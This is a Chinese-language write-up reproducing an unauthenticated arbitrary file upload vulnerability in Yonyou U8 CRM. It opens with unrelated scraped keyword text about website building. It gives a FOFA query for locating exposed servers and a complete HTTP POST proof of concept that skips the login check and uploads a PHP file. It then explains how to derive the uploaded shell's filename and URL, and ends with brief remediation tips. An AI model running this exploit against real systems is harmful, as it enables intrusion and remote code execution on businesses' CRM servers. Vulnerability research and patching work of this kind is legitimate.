请人做网站多少钱,网站建设创意报告书,做视频赚钱的网站有哪些,网站后期维修问题文章目录 用友U8 CRM客户关系管理任意文件上传漏洞复现0x01 前言0x02 漏洞描述0x03 影响平台0x04 漏洞环境0x05 漏洞复现1.访问漏洞环境2.构造POC3.复现4.访问shell地址 0x06 整改建议 用友U8 CRM客户关系管理任意文件上传漏洞复现
0x01 前言
免责声明#xff1a;请勿利用文… 文章目录 用友U8 CRM客户关系管理任意文件上传漏洞复现0x01 前言0x02 漏洞描述0x03 影响平台0x04 漏洞环境0x05 漏洞复现1.访问漏洞环境2.构造POC3.复现4.访问shell地址 0x06 整改建议 用友U8 CRM客户关系管理任意文件上传漏洞复现
0x01 前言
免责声明请勿利用文章内的相关技术从事非法测试由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失均由使用者本人负责所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用
0x02 漏洞描述
用友U8客户关系管理全面解决方案是基于中国企业最佳营销管理实践更符合中国企业营销管理特点客户关系管理的整合营销平台。产品融合数年来积累的知识、方法和经验目标是帮助企业有效获取商机、提升营销能力。
用友U8 crm客户关系管理 ajax/getemaildata.php任意文件上传漏洞。
0x03 影响平台
用友U8 CRM 0x04 漏洞环境 fofabody“用友U8CRM”
0x05 漏洞复现
1.访问漏洞环境 2.构造POC
POC POST
POST /ajax/getemaildata.php?DontCheckLogin1 HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 205
Content-Type: multipart/form-data; boundary----WebKitFormBoundarykS5RKgl8t3nwInMQ
Accept-Encoding: gzip, deflate------WebKitFormBoundarykS5RKgl8t3nwInMQ
Content-Disposition: form-data; namefile; filenameceshi.php
Content-Type: text/plain?php echo md5(123456);?------WebKitFormBoundarykS5RKgl8t3nwInMQ3.复现 发现成功执行响应成功
4.访问shell地址
上传之后返回的路径为上传之后返回的路径为D:\U8SOFT\turbocrm70\code\www\tmpfile\mht1312.tmp.mht
文件名称为mht1312.tmp.mht直接访问这个文件不解析需要访问另一个文件
上传之后会在目录下生成两个文件tmp.mht和tmp.php文件
访问的解析文件格式为upd*.tmp.php**
星号部分为返回的文件名的十六进制减去一。
例如 1312——31333132十六进制31333131十六进制减一——1311
最终的shell文件名为http://ip:port/tmpfile/upd1311.tmp.php
0x06 整改建议
1.设置权限限制禁止上传目录的执行权限 2.严格限制可上传的文件类型 3.严格限制可上传的文件路径 4.文件扩展名服务端白名单校验 5文件内容服务端校验 6.上传文件重命名 9.隐藏上传文件路径